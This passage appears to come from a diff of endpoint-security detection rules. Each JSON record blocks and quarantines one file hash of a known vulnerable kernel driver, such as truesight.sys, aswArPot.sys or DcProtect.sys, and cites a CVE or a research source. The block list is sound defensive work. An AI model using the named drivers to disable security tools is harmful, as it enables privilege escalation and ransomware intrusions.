"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969058Z", + "creation_date": "2026-03-23T11:45:29.969060Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969066Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4522e2cfa0b1f5d258a3cf85b87681d6969e0572f668024c465d635c236b5d9", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd6f857b-a102-502d-bee4-1655f980d644", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812152Z", + "creation_date": "2026-03-23T11:45:31.812154Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812159Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab1d2a46a4ebb992992bdf59226829ac72cfcf81fc0a3c15791a397bc4737673", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd76943a-1a27-5c00-957c-b61c1cab493e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476757Z", + "creation_date": "2026-03-23T11:45:31.476761Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476771Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2cd25da2ba833aa1a88d73135650434c2a6d684cf2db1261fce38aaabf54046e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd772af7-970b-55b5-bf86-30b5b908b8e9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980820Z", + "creation_date": "2026-03-23T11:45:29.980822Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980827Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e0aff24a54400fe9f86564b8ce9f874e7ff51e96085ff950baff05844cff2bd1", + "comment": "Vulnerable Kernel Driver (aka IObitUnlocker.sys) [https://www.loldrivers.io/drivers/4bf4b425-10af-4cd4-88e6-beb4b947eb48/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd799e87-5bc1-54bf-a6b8-e1ccf67afdc5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490489Z", + "creation_date": "2026-03-23T11:45:31.490490Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490496Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a3ea5b9a39bf55f900964a55dadae7e34fd9476d8346a4fa701f11760aefd6f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd7b8f69-b439-5094-bd7c-7dc49f6343d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455639Z", + "creation_date": "2026-03-23T11:45:30.455642Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455652Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e54e98df13110aac41f3207e400cce2a00df29ce18c32186e536c1de25a75ce", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd7fc026-6aa9-5b52-adca-d9f5f0d4242c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605752Z", + "creation_date": "2026-03-23T11:45:29.605754Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605760Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89b9823ed974a5b71de8468324d45b7e9d6dc914f93615ba86c6209b25b3cbf7", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd90d569-38de-57d8-b3f2-e1df84087617", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + 
"id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816246Z", + "creation_date": "2026-03-23T11:45:30.816248Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816253Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "42b31b850894bf917372ff50fbe1aff3990331e8bd03840d75e29dcc1026c180", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd9a9d8d-a442-558e-9616-b46094dc691a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157371Z", + "creation_date": "2026-03-23T11:45:31.157373Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157379Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d6e25ba22219c44a53b18b1aeb82c6e4299efe61128763211c0c5e392bcd1a6f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ddacb281-a386-573a-ba6a-a98227ab8a93", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811026Z", + "creation_date": "2026-03-23T11:45:31.811028Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811034Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "10dd106c43f4762a9ea463b7316640bf1c76fd77b682e4a79299ef1a9ddc0220", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ddae2fce-6488-56bd-9165-0eb0df7c3054", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610371Z", + "creation_date": 
"2026-03-23T11:45:29.610373Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610378Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e07bb866d329a2f9aaa4802bad04fdac9163de9bf9cfa1d035f5ca610b4b9bf", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ddc24181-ea17-51d2-9953-52dc2214cd67", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149300Z", + "creation_date": "2026-03-23T11:45:31.149302Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149308Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e5eb94cd2ed5bda08d9ca17115dbf51fe65b96a96b35ee4686a04b8cf95d39e0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"ddc906fa-63a2-5084-96a1-125979533406", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811833Z", + "creation_date": "2026-03-23T11:45:31.811835Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811840Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c432e1dfcb412fd0b3683bcfe4a9f7b49465287203d1deb2b8789b6ead00c725", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ddca0933-796e-5b4e-bf30-49cc688ec497", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604410Z", + "creation_date": "2026-03-23T11:45:29.604412Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.604418Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0cf72a6d8c4add613209a1af41c6b09013fa688c9841210b5ff1d2908d99bf00", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ddccab46-a61f-5e74-89f6-850e825c2668", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143540Z", + "creation_date": "2026-03-23T11:45:32.143542Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143548Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9dee9c925f7ea84f56d4a2ad4cf9a88c4dac27380887bf9ac73e7c8108066504", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ddd10f07-09a7-5ac9-b1cb-3a0689569074", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968403Z", + "creation_date": "2026-03-23T11:45:29.968405Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968410Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80", + "comment": "Ours Technology Inc. Dangerous I/O Driver (aka otipcibus64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dddb3d19-bd67-5e95-9c2e-a7033aef5d4e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150985Z", + "creation_date": "2026-03-23T11:45:31.150987Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150992Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "b8b9625620939b828ff2a5ba06f1bbba20514a04facdf5195f77451ccaa12338", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ddf1f45d-3842-5afb-9b5f-1b1896485f83", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500655Z", + "creation_date": "2026-03-23T11:45:31.500659Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500667Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "10b5c744cec261edf6fa5374662da30f95bd823f80797c4f018f5dfeb11faf8e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ddffc375-ccdc-5e38-b8fd-9898b1037f35", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": 
false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144288Z", + "creation_date": "2026-03-23T11:45:31.144290Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144295Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "41acac502ce4dc72091cf9a60425db333af0502eade520e532a4f8591fb6b5fc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de0553e0-2340-5758-8b2b-1b81148d6499", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144215Z", + "creation_date": "2026-03-23T11:45:31.144219Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144225Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72cb472d69def47fd89564c3f895867006908443f805971875533069a6efaf32", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 
AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de0943eb-deaf-5942-b021-772bedd0498b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829044Z", + "creation_date": "2026-03-23T11:45:30.829046Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829051Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c74de5c5805e87c2c2b2aec77e3416c4ddd175514950a45a7276b0972241b426", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de1681e7-21e2-5ab4-824b-ea93afa2e38d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.471864Z", + "creation_date": "2026-03-23T11:45:31.471868Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.471907Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4644ddf941ea48f122487f2a434bb4f88984b49c540f52d5f9e775b2371e2a17", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de265821-4b09-5cb3-bf26-0e6ba5f443a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143504Z", + "creation_date": "2026-03-23T11:45:32.143506Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143511Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b2247e68386c1bdfd48687105c3728ebbad672daffa91b57845b4e49693ffd71", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"de281c7d-d469-54f6-b88c-d14760339c79", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494968Z", + "creation_date": "2026-03-23T11:45:31.494970Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494975Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "58ab20e947ed3f42da8f9e9d0efeb2045ebe880207e20612139bd8cd777d579b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "de29eb6d-8d79-5078-8c72-7242928f7c85", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472403Z", + "creation_date": "2026-03-23T11:45:30.472407Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
